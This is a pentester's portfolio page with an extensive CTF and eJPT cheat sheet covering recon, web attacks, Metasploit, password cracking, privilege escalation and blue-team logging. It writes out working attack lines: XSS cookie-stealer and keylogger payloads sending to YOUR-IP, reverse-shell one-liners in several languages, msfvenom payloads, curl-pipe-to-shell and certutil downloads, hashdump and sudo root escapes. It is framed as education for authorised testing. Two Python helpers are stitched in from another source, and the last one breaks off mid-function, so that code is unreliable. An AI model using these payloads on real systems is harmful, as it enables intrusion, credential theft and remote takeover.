Akshay A — Cyb3rak
cybersecurity · ethical hacking · content creator

AKSHAY A.

Cyb3rak — Think like a hacker. Defend like a pro.

eJPT Certified · ICCA In Progress · 2026

eJPT certified ethical hacker, SOC analyst, and cybersecurity educator. TryHackMe Top 1%. I build CTF machines, investigate threats, and share everything I learn — for free.

about

Who I am

I'm Akshay A, known online as Cyb3rak and cyb3rb0y — a penetration tester, SOC analyst, CTF creator, and cybersecurity educator based in Kerala, India. I hold the eJPT certification and rank in the Top 1% on TryHackMe.

I design and deploy custom CTF machines on TryHackMe, investigate threats using Splunk and Windows Event Logs, and produce free cybersecurity education covering ethical hacking, penetration testing, blue team operations, and CTF challenges.

I believe the best defenders think like attackers. Everything I learn, I teach — openly and for free.

// quick info

Alias: Cyb3rak / cyb3rb0y
Certifications: eJPT · ICCA (in progress)
TryHackMe: cyb3rbuddy · Top 1%
Background: Pentester · SOC Analyst · CTF Creator
YouTube: @Cyb3rak
Focus: Red Team · Blue Team
content

YouTube Channel

Free cybersecurity tutorials, ethical hacking tips, and tool walkthroughs in English.

Cyb3rak on YouTube

Dedicated to learning cybersecurity and ethical hacking for free. To beat a hacker you need to think like a hacker — subscribe and start learning today.


// all videos at youtube.com/@Cyb3rak

projects

What I've Built

Custom CTF machines, labs, and hands-on security projects.

Custom CTF TryHackMe
● Live
🚩
cyb3rak:hack22
FTP → Web Enum → SSH → PrivEsc → Root

A multi-stage Linux CTF machine built around chained thinking and enumeration. Covers FTP recon, web directory discovery, credential hiding, SSH access, and privilege escalation. Active room with an official walkthrough on Medium.

Linux FTP Web Recon SSH PrivEsc CTF Design
Custom CTF TryHackMe
■ Retired
🔒
cyb3rak:hack12
FTP → Base64 Creds → SSH → /etc/shadow → Root

Easy-to-intermediate Linux CTF. Players enumerate anonymous FTP, discover hidden web paths, decode Base64 credentials from page source, and escalate to root via /etc/shadow. Room retired — official writeup available.

Linux FTP Base64 SSH PrivEsc CTF Design
Splunk Blue Team
● Live
🛡️
Splunk SOC Investigation
Splunk Setup → Log Ingestion → Event ID 4625 → Brute-Force Detection

A beginner-friendly Splunk investigation walkthrough — setting up Splunk, ingesting Windows event logs, and hunting Event ID 4625 (failed logon) to detect and investigate brute-force attacks. Perfect starting point for aspiring SOC analysts.

Splunk Windows Logs Event ID 4625 Brute-Force Detection Blue Team SOC

Let's connect.

Collaboration, cybersecurity questions, or just want to say hi — find me on any platform.

Reconnaissance

Nmap

Network Mapper — the essential first tool in any pentest. Maps open ports, detects services, versions, and OS. Always start here.

My workflow: Fast scan all ports first (-p-), then targeted -sC -sV on only the open ones. Saves a ton of time.

Core Scans

Quick scan — top 1000 ports
nmap <target-ip>
All 65535 ports
nmap -p- <target-ip>
Service + version detection
nmap -sC -sV <target-ip>
Full recon — scripts, versions, save output
nmap -sC -sV -p- <target-ip> -oN nmap.txt
Aggressive scan (OS + traceroute + scripts)
nmap -A <target-ip>
SYN stealth scan (requires root)
sudo nmap -sS <target-ip>
UDP scan (slow — use on specific ports)
sudo nmap -sU -p 53,67,68,161,162 <target-ip>
Ping sweep — find live hosts
nmap -sn 192.168.1.0/24

NSE Scripts

Vulnerability scan
nmap --script vuln <target-ip>
SMB vulnerability check (EternalBlue etc)
nmap --script smb-vuln* -p 445 <target-ip>
HTTP enumeration scripts
nmap --script http-enum,http-title -p 80,443 <target-ip>
FTP anonymous login check
nmap --script ftp-anon -p 21 <target-ip>

Key Flags Reference

Flag | Description
-sS | SYN stealth (half-open) scan — requires root
-sU | UDP scan — slow, use on specific ports
-sC | Run default NSE scripts
-sV | Service/version detection
-O | OS detection
-A | Aggressive: OS + version + scripts + traceroute
-T4 | Faster timing (T0=paranoid → T5=insane)
-p- | Scan all 65535 ports
-oN / -oX / -oG | Save as normal / XML / grepable
-v / -vv | Verbose output
--script vuln | Vulnerability detection scripts
--open | Only show open ports
Legal: Only scan systems you own or have explicit written permission to test. Unauthorized scanning is illegal.
Reconnaissance

Gobuster / Ffuf

Web content discovery tools. Gobuster is the go-to for directory and DNS brute-forcing; Ffuf is faster and more flexible, great for fuzzing parameters, virtual hosts, and more.

Tip: Always add -x php,html,txt,bak,zip — many CTF flags hide in backup files or non-obvious extensions.

Gobuster

Basic directory scan
gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt
With extensions — find hidden files
gobuster dir -u http://<target> -w common.txt -x php,html,txt,bak,zip
Add cookies (authenticated scan)
gobuster dir -u http://<target> -w common.txt -c "session=abc123"
DNS subdomain enumeration
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Virtual host discovery
gobuster vhost -u http://target.com -w subdomains.txt --append-domain

Ffuf

Directory fuzzing
ffuf -u http://<target>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
Filter by response size (remove false positives)
ffuf -u http://<target>/FUZZ -w common.txt -fs 4242
Parameter fuzzing (GET)
ffuf -u "http://<target>/page?FUZZ=value" -w params.txt
Virtual host fuzzing
ffuf -u http://<target> -H "Host: FUZZ.target.com" -w subdomains.txt -fs 0

Best Wordlists

Wordlist | Use Case
dirb/common.txt | Quick starting point, fast
dirbuster/directory-list-2.3-medium.txt | More thorough directory scan
SecLists/Discovery/Web-Content/raft-large-directories.txt | Most comprehensive
SecLists/Discovery/DNS/subdomains-top1million-5000.txt | Subdomain enumeration
SecLists/Discovery/Web-Content/common.txt | Good all-rounder for ffuf
Reconnaissance

SMB Enumeration

SMB (ports 139/445) is one of the most common attack surfaces in CTFs and real engagements. Anonymous access, weak credentials, and unpatched exploits (EternalBlue) are frequent findings.

Tip: Always check for null/anonymous SMB sessions first — they often give you usernames and shares without needing credentials at all.

Enumeration

Full SMB enumeration (users, shares, OS)
enum4linux -a <target-ip>
List shares (anonymous)
smbclient -L //<target-ip> -N
Connect to a share
smbclient //<target-ip>/sharename -N
Connect with credentials
smbclient //<target-ip>/sharename -U username
Download all files from share
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
CrackMapExec — check creds across network
crackmapexec smb <target-ip> -u username -p password

Nmap SMB Scripts

Check for known SMB vulnerabilities
nmap --script smb-vuln* -p 445 <target-ip>
Enumerate users and shares
nmap --script smb-enum-shares,smb-enum-users -p 445 <target-ip>

Common Findings

Finding | What to Do
Anonymous/null session | Run enum4linux, browse shares with -N flag
Readable shares | Look for passwords, config files, scripts
Writable shares | Drop a .scf or .lnk file to capture NTLMv2 hash via Responder
EternalBlue (MS17-010) | Use Metasploit exploit/windows/smb/ms17_010_eternalblue
Usernames found | Feed into Hydra or Kerbrute for password attacks
Web Exploitation

Burp Suite

The industry-standard web application security testing toolkit. Intercept, modify, and replay HTTP/S traffic. Essential for web pentesting, bug bounty, and CTFs.

Setup: Install FoxyProxy in your browser, point it to 127.0.0.1:8080. For HTTPS, visit http://burp with proxy on and install the CA cert.

Core Workflow

Feature | How to Use
Intercept | Proxy → Intercept ON → browse target → modify & forward
Repeater | Right-click request → Send to Repeater → tweak & resend manually
Intruder | Send to Intruder → mark payload positions (§§) → load wordlist → Attack
Decoder | Decode/encode Base64, URL, HTML, Hex on the fly
Comparer | Diff two requests/responses to spot subtle differences
Scanner | Pro only — passive/active automated vuln scanning

Useful Tricks

Launch Burp Suite on Kali
burpsuite # proxy runs on 127.0.0.1:8080
Intercept + modify a request
# Proxy → Intercept ON → browse → edit params in raw tab → Forward
Brute-force login with Intruder (Sniper)
# Right-click request → Send to Intruder
# Mark password field: §value§
# Payloads tab → load rockyou.txt → Start Attack
Test IDOR — change user ID in Repeater
# GET /api/user?id=1 → Repeater → change id=2,3... → check response
Save request to file (for sqlmap)
# Right-click request → Save item → use with sqlmap -r request.txt
Free vs Pro: Community edition is enough for CTFs. Intruder is rate-limited in free version — use Hydra for fast brute-forcing instead.
Web Exploitation

SQLMap

Automated SQL injection detection and exploitation. Can enumerate databases, dump tables, read/write files, and even get a shell depending on DBMS privileges.

Warning: SQLMap can be loud and cause damage. Only use on systems you have permission to test. Use --level and --risk flags carefully.

Basic Usage

Test URL for SQLi
sqlmap -u "http://target.com/page?id=1"
List all databases
sqlmap -u "http://target.com/page?id=1" --dbs
List tables in a database
sqlmap -u "http://target.com/page?id=1" -D dbname --tables
Dump a specific table
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump
Use Burp request file (best for POST/cookies)
sqlmap -r request.txt --dbs
Test with cookie authentication
sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123" --dbs
Attempt to get OS shell
sqlmap -u "http://target.com/page?id=1" --os-shell

Useful Flags

Flag | Description
--level 1-5 | Test intensity (default 1, use 3+ for thorough)
--risk 1-3 | Risk of payloads (1=safe, 3=includes heavy tests)
--batch | Non-interactive, auto-answer all prompts
--forms | Auto-detect and test forms on the page
--random-agent | Use random User-Agent to evade basic WAFs
--technique=U | Specify injection type: B(oolean), E(rror), U(nion), T(ime)
Web Exploitation

XSS Notes

Cross-Site Scripting — injecting scripts into pages viewed by other users. OWASP Top 10. Can lead to session hijacking, credential theft, keylogging, and account takeover.

XSS Types

Type | How It Works | Impact
Reflected | Payload in URL, reflected in response. Victim must click crafted link. | Session theft, phishing
Stored | Payload saved in DB, fires for every visitor. Most dangerous. | Wormable, mass compromise
DOM-based | Vulnerable client-side JS reads attacker-controlled DOM source. | Same as above, harder to detect

Test Payloads

Basic alert — confirm XSS fires
<script>alert(1)</script>
Image onerror — bypass <script> filters
<img src=x onerror=alert(1)>
SVG onload
<svg onload=alert(1)>
Event handler in attribute context
" onmouseover="alert(1)
Cookie stealer — send to your server
<script>new Image().src='http://YOUR-IP/?c='+document.cookie</script>
Keylogger snippet
<script>document.onkeypress=e=>fetch('http://YOUR-IP/?k='+e.key)</script>

WAF Bypass Techniques

Case mixing
<ScRiPt>alert(1)</ScRiPt>
HTML entity encoding
<img src=x onerror=alert(1)>
JavaScript URI
<a href="javascript:alert(1)">click</a>
Blind XSS: Use XSS Hunter (xsshunter.com) or Burp Collaborator — they generate unique payloads and notify you when they fire in an admin panel you can't see.
Web Exploitation

Nikto

Web server scanner that checks for dangerous files, outdated software, misconfigurations, and known vulnerabilities. Noisy but comprehensive — great for a first pass on any web target.

Nikto is loud. It will definitely appear in server logs. Only use with permission.

Common Commands

Basic scan
nikto -h http://<target>
Scan HTTPS target
nikto -h https://<target> -ssl
Specify port
nikto -h <target> -p 8080
Scan through Burp proxy
nikto -h http://<target> -useproxy http://127.0.0.1:8080
Save output to file
nikto -h http://<target> -o nikto.txt

What Nikto Finds

Finding | Significance
Server version disclosure | Check if version has known CVEs
/admin, /backup, /test | Common sensitive paths exposed
Default credentials | Test for vendor default logins
Dangerous HTTP methods | PUT/DELETE enabled — possible file upload/delete
Missing security headers | X-Frame-Options, CSP, HSTS missing
Outdated software | Apache, PHP, WordPress versions with CVEs
Exploitation

Metasploit Framework

The world's most-used penetration testing framework. Hundreds of exploits, payloads, and post-exploitation modules covering the full attack lifecycle.

Core Workflow

Start Metasploit console
msfconsole
Search for a module
msf6> search eternalblue
Use, configure, and run a module
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS <target-ip>
msf6> set LHOST <your-ip>
msf6> set LPORT 4444
msf6> show options
msf6> run
Background session & list sessions
meterpreter> background
msf6> sessions -l
msf6> sessions -i 1

Meterpreter Post-Exploitation

System info + whoami
meterpreter> sysinfo
meterpreter> getuid
Dump password hashes
meterpreter> hashdump
Privilege escalation attempt
meterpreter> getsystem
Upload / download files
meterpreter> upload /path/to/file.exe C:\Users\Public
meterpreter> download C:\flag.txt
Drop into system shell
meterpreter> shell

Msfvenom — Payload Generator

Windows reverse shell EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe
Linux reverse shell ELF
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f elf -o shell.elf
PHP webshell
msfvenom -p php/reverse_php LHOST=<ip> LPORT=4444 -f raw -o shell.php
List all payloads
msfvenom -l payloads | grep linux
Legal: Only use Metasploit on systems you own or have explicit written permission to test.
Exploitation

Reverse Shells

A reverse shell makes the target connect back to your listener. Set up your listener first, then execute the payload on the target.

Start a Listener

Netcat listener
nc -lvnp 4444
Metasploit multi/handler (for meterpreter)
msf6> use multi/handler
msf6> set payload linux/x64/shell_reverse_tcp
msf6> set LHOST <your-ip>
msf6> run

Shell One-Liners

Bash TCP
bash -i >& /dev/tcp/<your-ip>/4444 0>&1
Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<ip>",4444));[os.dup2(s.fileno(),x) for x in range(3)];subprocess.call(["/bin/sh"])'
PHP
php -r '$sock=fsockopen("<ip>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Netcat (with -e)
nc <your-ip> 4444 -e /bin/bash
PowerShell (Windows)
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('<ip>',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([text.encoding]::ASCII).GetBytes($r);$s.Write($sb,0,$sb.Length)}"

Upgrade to Full TTY

Step 1 — Spawn PTY with Python
python3 -c 'import pty;pty.spawn("/bin/bash")'
Step 2 — Background & fix terminal
# Ctrl+Z to background
stty raw -echo; fg
# Press Enter twice, then:
export TERM=xterm
Generator: Visit revshells.com for an interactive generator supporting dozens of languages, with URL encoding and base64 options.
Exploitation

File Transfer

Getting tools and files onto (and off) a target is a critical skill. These are the methods that work in most CTF and real-world scenarios.

Serving Files from Your Attack Machine

Python HTTP server (most common)
python3 -m http.server 8000
PHP server
php -S 0.0.0.0:8000
Netcat — send a file
# Receiver: nc -lvnp 4444 > file.txt
# Sender: nc <receiver-ip> 4444 < file.txt

Downloading on the Target (Linux)

wget
wget http://<your-ip>:8000/linpeas.sh -O /tmp/linpeas.sh
curl
curl http://<your-ip>:8000/linpeas.sh -o /tmp/linpeas.sh
Download and pipe directly (no file on disk)
curl http://<your-ip>:8000/linpeas.sh | bash

Downloading on the Target (Windows)

PowerShell wget
powershell -c "Invoke-WebRequest -Uri 'http://<ip>:8000/shell.exe' -OutFile 'C:\Users\Public\shell.exe'"
PowerShell (short form)
powershell -c "IWR 'http://<ip>:8000/file.exe' -O 'C:\Users\Public\file.exe'"
certutil (bypasses some restrictions)
certutil -urlcache -split -f http://<ip>:8000/file.exe file.exe
Impacket SMB server (for SMB transfers)
impacket-smbserver share . -smb2support
# Windows: copy \\<your-ip>\share\file.exe .
Password Attacks

Hydra

Fast parallelised network login cracker. Supports SSH, FTP, HTTP, SMB, RDP, MySQL, and dozens more protocols. The go-to tool for online brute-forcing.

Common Attacks

SSH brute-force (known username)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://<target-ip>
SSH with user list + password list
hydra -L users.txt -P rockyou.txt ssh://<target-ip>
FTP brute-force
hydra -l admin -P rockyou.txt ftp://<target-ip>
HTTP POST login form
hydra -l admin -P rockyou.txt <ip> http-post-form "/login:user=^USER^&pass=^PASS^:Invalid credentials"
RDP brute-force
hydra -l administrator -P rockyou.txt rdp://<target-ip>
SMB brute-force
hydra -l admin -P rockyou.txt smb://<target-ip>

Key Flags

Flag | Description
-l / -L | Single username / username list file
-p / -P | Single password / password list file
-t | Parallel tasks per target (default 16)
-f | Stop after first valid login found
-V | Verbose — show every attempt
-s | Custom port (e.g. -s 2222 for SSH on non-standard port)
-o | Save found credentials to file
Password Attacks

John the Ripper / Hashcat

Offline password crackers. John auto-detects hash formats and is great for CTFs; Hashcat uses GPU acceleration and is faster for large hash sets on your own hardware.

John the Ripper

Auto-detect hash & crack
john hashes.txt
Crack with rockyou wordlist
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Specify hash format manually
john hashes.txt --format=NT --wordlist=rockyou.txt
Show cracked passwords
john hashes.txt --show
Crack Linux /etc/shadow
unshadow /etc/passwd /etc/shadow > combined.txt
john combined.txt --wordlist=rockyou.txt
Crack zip password
zip2john protected.zip > zip.hash
john zip.hash --wordlist=rockyou.txt
Crack SSH private key passphrase
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=rockyou.txt

Hashcat

Crack MD5 hashes with rockyou
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
NTLM hashes (Windows)
hashcat -m 1000 hashes.txt rockyou.txt
bcrypt hashes
hashcat -m 3200 hashes.txt rockyou.txt
Rule-based attack (better coverage)
hashcat -m 0 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Common Hash Mode Numbers

Mode | Hash Type
0 | MD5
100 | SHA1
1400 | SHA256
1000 | NTLM (Windows)
3200 | bcrypt
13100 | Kerberoast (TGS-REP)
Identify unknown hashes: Use hash-identifier (CLI) or hashes.com/en/tools/hash_identifier (web) to figure out the format before cracking.
Privilege Escalation

LinPEAS / WinPEAS

PEASS-ng — automated post-exploitation enumeration scripts. After you land a shell, run this immediately. It colour-codes everything by severity so you know exactly where to look.

Getting It onto the Target

1. Serve from your attack machine
python3 -m http.server 8000
2. Download and run on target (no file on disk)
curl http://<your-ip>:8000/linpeas.sh | sh
Save output to review later
./linpeas.sh 2>&1 | tee /tmp/lp.txt # redirect stderr before the pipe so both streams land in the file
WinPEAS (Windows PowerShell)
powershell -c "IWR 'http://<ip>:8000/winPEASany.exe' -O $env:TEMP\wp.exe; $env:TEMP\wp.exe"
Colour guide: Red/Yellow highlight = 95% privesc vector — check these first. Red = high interest. Yellow = config issues worth reviewing.

What to Look For in Output

Section | What It Means
Sudo -l | Binaries you can sudo → check GTFOBins immediately
SUID/SGID binaries | Non-standard SUID binaries → GTFOBins
Writable cron jobs | You can inject commands that run as root
Passwords in files | Config files, history files, env variables
Capabilities | cap_setuid+ep on python/perl → instant root
Network connections | Internal services only accessible from localhost
Privilege Escalation

Linux PrivEsc Notes

Manual checks and techniques for escalating privileges on Linux. Always run LinPEAS first, then use these for manual follow-up on interesting findings.

Situational Awareness

Who am I, what groups?
id && whoami && groups
OS version + kernel
uname -a && cat /etc/os-release
Sudo permissions
sudo -l
Running processes (as root?)
ps aux | grep root
Environment variables (passwords?)
env && cat ~/.bash_history

Common Vectors

Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
Check cron jobs
cat /etc/crontab
ls -la /etc/cron.d/ /etc/cron.daily/ /var/spool/cron/crontabs/
World-writable files
find / -writable -type f 2>/dev/null | grep -v proc
Check capabilities
getcap -r / 2>/dev/null
NFS shares (no_root_squash?)
cat /etc/exports
Passwords in config files
grep -r "password" /etc /var /home 2>/dev/null | grep -v Binary

GTFOBins Quick Escapes

GTFOBins (gtfobins.github.io) — if you can sudo or SUID a binary, look it up here for a one-liner root escape.
sudo vim
sudo vim -c ':!/bin/bash'
sudo find
sudo find . -exec /bin/bash \; -quit
sudo python3
sudo python3 -c 'import os;os.system("/bin/bash")'
sudo less / man
sudo less /etc/passwd # then type: !/bin/bash
sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'
Capability privesc (python has cap_setuid)
python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
My Notes

Steganography

Hidden data inside images, audio, and files. A common CTF category — flags are often embedded in JPGs, PNGs, WAV files, or disguised using file format tricks.

Methodology: Always check file type → metadata → strings → binwalk → steghide/zsteg. Work through the checklist systematically.

Initial Checks

Check real file type (ignore extension)
file suspicious_file
Extract all metadata (EXIF)
exiftool file.jpg
Look for hidden strings
strings file.jpg | grep -i "flag\|ctf\|pass\|key\|secret"
Hex dump — look at file headers
xxd file.jpg | head -20

File Carving & Extraction

Binwalk — find embedded files
binwalk file.jpg
Binwalk — extract embedded files
binwalk -e file.jpg
Foremost — carve by file signature
foremost -i file.jpg -o output/
Steghide — extract hidden data
steghide extract -sf file.jpg
Steghide — with password
steghide extract -sf file.jpg -p password
Zsteg — PNG/BMP LSB steganography
zsteg file.png
Stegseek — brute-force steghide passphrase
stegseek file.jpg /usr/share/wordlists/rockyou.txt

Audio Steganography

Strings in WAV
strings audio.wav | grep -i "flag\|ctf"
Spectrogram (open in Sonic Visualiser or Audacity)
# Open file in Audacity → View → Spectrogram — look for text/images in frequencies

Common File Magic Bytes

Magic Bytes (hex) | File Type
FF D8 FF | JPEG/JPG
89 50 4E 47 | PNG
47 49 46 38 | GIF
50 4B 03 04 | ZIP (also DOCX, XLSX, JAR)
25 50 44 46 | PDF
7F 45 4C 46 | ELF (Linux executable)
4D 5A | MZ — Windows EXE/DLL
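A small Python helper, added here as an illustration rather than taken from the page's own tooling, that applies the magic-bytes table above: it identifies a file by its leading bytes, flags an extension that disagrees with the content (the "file type before extension" rule in the checklist), and scans a blob for embedded signatures the way the binwalk step does. The sample bytes and the extension lists are constructed for the example.

```python
import os
from typing import List, Optional, Tuple

# Signatures from the magic-bytes table above. ZIP also covers DOCX/XLSX/JAR.
MAGIC = {
    bytes.fromhex("FFD8FF"): "JPEG",
    bytes.fromhex("89504E47"): "PNG",
    bytes.fromhex("47494638"): "GIF",
    bytes.fromhex("504B0304"): "ZIP",
    bytes.fromhex("25504446"): "PDF",
    bytes.fromhex("7F454C46"): "ELF",
    bytes.fromhex("4D5A"): "MZ",
}

# Extensions that legitimately carry each signature (assumed list, not exhaustive).
EXPECTED_EXT = {
    "JPEG": {".jpg", ".jpeg"},
    "PNG": {".png"},
    "GIF": {".gif"},
    "ZIP": {".zip", ".docx", ".xlsx", ".jar"},
    "PDF": {".pdf"},
    "ELF": {"", ".elf", ".so"},
    "MZ": {".exe", ".dll"},
}


def identify(data: bytes) -> Optional[str]:
    """File type implied by the leading bytes, or None if no signature matches.
    Longer signatures are tried first so the 2-byte MZ check cannot win by accident."""
    for sig in sorted(MAGIC, key=len, reverse=True):
        if data.startswith(sig):
            return MAGIC[sig]
    return None


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension lies about the content, e.g. a ZIP renamed to .png."""
    kind = identify(data)
    if kind is None:
        return False  # unknown content: nothing to compare against
    ext = os.path.splitext(filename)[1].lower()
    return ext not in EXPECTED_EXT[kind]


def find_embedded(data: bytes) -> List[Tuple[int, str]]:
    """Every (offset, type) where a known signature occurs, sorted by offset.
    An offset other than 0 is what binwalk would report as an embedded file.
    MZ is skipped: two bytes are far too short to search for inside arbitrary data."""
    hits = []
    for sig, kind in MAGIC.items():
        if len(sig) < 3:
            continue
        start = 0
        while (pos := data.find(sig, start)) != -1:
            hits.append((pos, kind))
            start = pos + 1
    return sorted(hits)


# Constructed sample: a JPEG header, 20 bytes of padding, then a ZIP appended at offset 23.
SAMPLE = bytes.fromhex("FFD8FF") + b"\x00" * 20 + bytes.fromhex("504B0304") + b"flag.txt"

if __name__ == "__main__":
    print(identify(SAMPLE), extension_mismatch("photo.png", SAMPLE), find_embedded(SAMPLE))
```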
My Notes

CTF Tips

Personal methodology for CTF challenges — built from TryHackMe, PicoCTF, and my own cyb3rak:hack series.

My Methodology

1. Enumerate first — always. Don't rush to exploit. Nmap every port, gobuster every directory. The more you enumerate, the more attack surface you find.
2. Document everything. One .txt file per machine. Every port, service, username, password, finding. You will forget things and you will thank yourself later.
3. Check the obvious. robots.txt, /admin, page source, JS files, default creds (admin:admin, admin:password). These catch more flags than you'd expect.
4. Version numbers matter. Any service version you find → searchsploit, ExploitDB, CVE search. The path to root is often a known CVE that just needs a number.
5. Stuck? Step back and re-enumerate. You almost certainly missed something. Re-read Nmap output. Run Gobuster with a different wordlist. Check if you missed a port.
6. Google everything. "service name exploit", "CVE-XXXX-XXXX PoC", "HTB machine name walkthrough". The community has seen it. HackTricks is your bible.

Port Cheatsheet

Port | Service | Attack Angle
21 | FTP | Anonymous login → ftp <ip>, user: anonymous. Version CVEs.
22 | SSH | Username enum, brute-force (Hydra), default/weak creds, weak key
23 | Telnet | Cleartext — default creds, sniff with Wireshark
25 | SMTP | User enumeration with VRFY/EXPN
53 | DNS | Zone transfer: dig axfr @<ip> domain.com
80/443 | HTTP/S | Gobuster, robots.txt, source, Burp, Nikto, SQLi, XSS
110/143 | POP3/IMAP | Email access — brute-force or default creds
139/445 | SMB | Null session, enum4linux, smbclient, EternalBlue
3306 | MySQL | Default creds (root:root, root:blank), remote login
3389 | RDP | Brute-force (Hydra), BlueKeep (CVE-2019-0708)
5985/5986 | WinRM | evil-winrm if you have creds
6379 | Redis | Unauthenticated access — read/write data, RCE possible

Quick Wins Checklist

Web: Check robots.txt, /sitemap.xml, /.git/, /.env, /backup, /config, view-source for comments and API keys.
Credentials: Try admin:admin, admin:password, admin:<machine-name>, user:user. Also check passwords found elsewhere in the box (password reuse is common in CTFs).
After shell: Run LinPEAS immediately. Check sudo -l. Look for SUID. Check /opt, /home/*/.
Hunt for flags in /root/root.txt, /home/user/user.txt — the standard CTF locations.
Encoding: See something weird? Try base64 decode, ROT13, hex decode, URL decode. Use CyberChef (gchq.github.io/CyberChef) for everything.
Certification

eJPT Notes

Personal notes from passing the eJPT (eLearnSecurity Junior Penetration Tester) in 2026. Open-book, practical exam — these are the things that matter most.

What Actually Matters

Networking first. Understand subnets, CIDR, and routing. The exam has multi-subnet scenarios — know how to add routes and pivot through networks using Metasploit's autoroute.
Enumerate thoroughly. It's open-book. Slow down, run full Nmap scans, check every service. The questions are specific — the answers are in your enumeration output.
Web basics. Directory brute-forcing, basic SQLi (manual and sqlmap), login brute-forcing with Hydra. Gobuster + Hydra handle most web questions.
Metasploit workflow. search → use → show options → set RHOSTS/LHOST → run. Know how to use multi/handler, autoroute, and the post exploitation modules.
Take notes as you go. The exam is 48h but you can do it in 4-6h if prepared. Write down every IP, open port, cred, and finding. Many questions connect.

Best Study Resources

Resource | Why It Helps
INE Free Starter Pass | Official course — covers every tested topic, labs included
TryHackMe Jr Pentester Path | Best practical hands-on prep — do this before the exam
HackTheBox Starting Point | Builds confidence with real machines at beginner level
youtube.com/@Cyb3rak | My walkthroughs and tool guides cover eJPT topics directly
Defense

Blue Team Basics

Understanding the defender's perspective makes you a better attacker — and a more well-rounded security professional. Blue team work is about detection, visibility, and response.

Core mindset: Attackers need to succeed once. Defenders need to succeed every time. Focus on visibility — you can only respond to what you can see.

Key Windows Event IDs

Event ID | What It Means | Why It Matters
4624 | Successful logon | Baseline logins; alert on anomalous times/IPs
4625 | Failed logon | Brute-force attempts — many in short time = attack
4648 | Logon with explicit credentials | Lateral movement indicator (pass-the-hash)
4672 | Admin privileges assigned | Privilege escalation or admin account use
4688 | New process created | Detect suspicious child processes (cmd.exe from Word)
4698 | Scheduled task created | Persistence mechanism — attackers love scheduled tasks
4720 | New user account created | Persistence — attacker creating backdoor accounts
4776 | NTLM auth attempt | NTLM relay/pass-the-hash attacks
7045 | New service installed | Malware persistence via services

Linux Log Files to Monitor

Log File | What It Contains
/var/log/auth.log | SSH logins, sudo use, failed auth attempts (Debian/Ubuntu)
/var/log/secure | Same as above on RHEL/CentOS
/var/log/syslog | General system activity, service starts/stops
/var/log/apache2/access.log | Web requests — look for SQLi, path traversal, scanners
/var/log/apache2/error.log | Application errors, often reveals attack attempts
/var/log/fail2ban.log | IPs blocked by fail2ban — shows who was brute-forcing
/root/.bash_history | Commands run as root — check for attacker activity

Quick Log Analysis Commands

Failed SSH logins
grep "Failed password" /var/log/auth.log | tail -20
Successful SSH logins
grep "Accepted" /var/log/auth.log | tail -20
Top attacking IPs
grep "Failed password" /var/log/auth.log | grep -oE "from [0-9.]+" | awk '{print $2}' | sort | uniq -c | sort -rn | head -10 # anchor on "from": the field number shifts when the line says "invalid user"
Sudo usage history
grep "sudo" /var/log/auth.log | grep "COMMAND"
Look for web scanner signatures in Apache logs
grep -i "nikto\|sqlmap\|nmap\|masscan\|zgrab" /var/log/apache2/access.log
Find recently modified files (possible tampering)
find /var/www /etc -mtime -1 -type f 2>/dev/null
Free SIEM: Look into Splunk Free (500MB/day) or Elastic Stack (ELK) for centralised log management and alerting on your home lab.
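The same detection as the "Top attacking IPs" pipeline above, written as a small Python script (added here as an example, not part of the page's own toolkit) over a constructed auth.log excerpt. It counts failures per source IP and, going one step further than the one-liners, flags an IP whose run of failures is followed by a successful login, which is the failed-then-successful pairing the Splunk 4625/4624 investigation in the projects section looks for.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed auth.log excerpt in the Debian/Ubuntu sshd format. 10.0.0.5 guesses
# several accounts and finally gets in as root; 192.168.1.20 is a user who mistyped once.
SAMPLE_LOG = """\
Mar  3 10:15:01 web01 sshd[2101]: Failed password for invalid user admin from 10.0.0.5 port 51234 ssh2
Mar  3 10:15:03 web01 sshd[2101]: Failed password for invalid user admin from 10.0.0.5 port 51236 ssh2
Mar  3 10:15:04 web01 sshd[2103]: Failed password for root from 10.0.0.5 port 51240 ssh2
Mar  3 10:15:06 web01 sshd[2105]: Failed password for root from 10.0.0.5 port 51244 ssh2
Mar  3 10:15:09 web01 sshd[2107]: Accepted password for root from 10.0.0.5 port 51250 ssh2
Mar  3 10:20:11 web01 sshd[2120]: Failed password for alice from 192.168.1.20 port 40000 ssh2
Mar  3 10:20:30 web01 sshd[2122]: Accepted publickey for alice from 192.168.1.20 port 40002 ssh2
"""

# Anchoring on "for <user> from <ip>" avoids the field-counting trap: the optional
# "invalid user" prefix shifts whitespace-split fields by two, so awk '{print $11}'
# prints a username instead of an IP for those lines.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(\S+) from (\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse(log: str) -> List[Tuple[str, str, str]]:
    """(outcome, username, source_ip) for every sshd auth line, in log order."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if m:
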